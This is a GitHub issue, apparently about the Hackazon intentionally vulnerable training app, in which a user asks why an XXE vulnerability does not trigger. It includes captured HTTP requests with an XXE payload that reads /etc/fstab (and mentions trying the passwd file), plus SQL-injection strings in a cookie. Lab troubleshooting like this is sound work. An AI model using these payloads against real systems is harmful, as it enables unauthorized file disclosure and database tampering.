Skip to content
This repository was archived by the owner on May 18, 2021. It is now read-only.

Issues with XXE #25

Open
Open
Issues with XXE#25
@artsalmon

Description

@artsalmon
artsalmon
opened on Apr 8, 2020

XXE vulnerabilities seem not to be function.

I have verified that in XXE is enabled in the vulnerabilities.md file, I have also logged in to the admin page and ensured that there are pages with the XXE vulnerability was enabled. I turned it on every location that I could, just in case. I verified the PHP files in the config location to ensure the the XXE was set to true for the location I was needing. I enabled XXE for the Cart/View area.

I setup BURP to intercept the HTTP GET requests, and I capture the code below

---ORGINAL CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
---END OF CODE---

I modified the code to have the XML example code in the vulnerability

---MODIFIED CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<'?xml version="1.0" encoding="utf-8"?>
<'!DOCTYPE roottag [<'!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<'roottag>&goodies;
---END OF CODE---

NOTE: I added ' at the start of each line to allow the code to display correctly in the note. In the real example, the ' was removed.

I have also modified the goodies to see if the PASSWD file would display.

I only get a HTML 400 return error.

I have clearing the cache, I have tried doing this is a VM with no other content, I ensure that firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with hackazon?

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions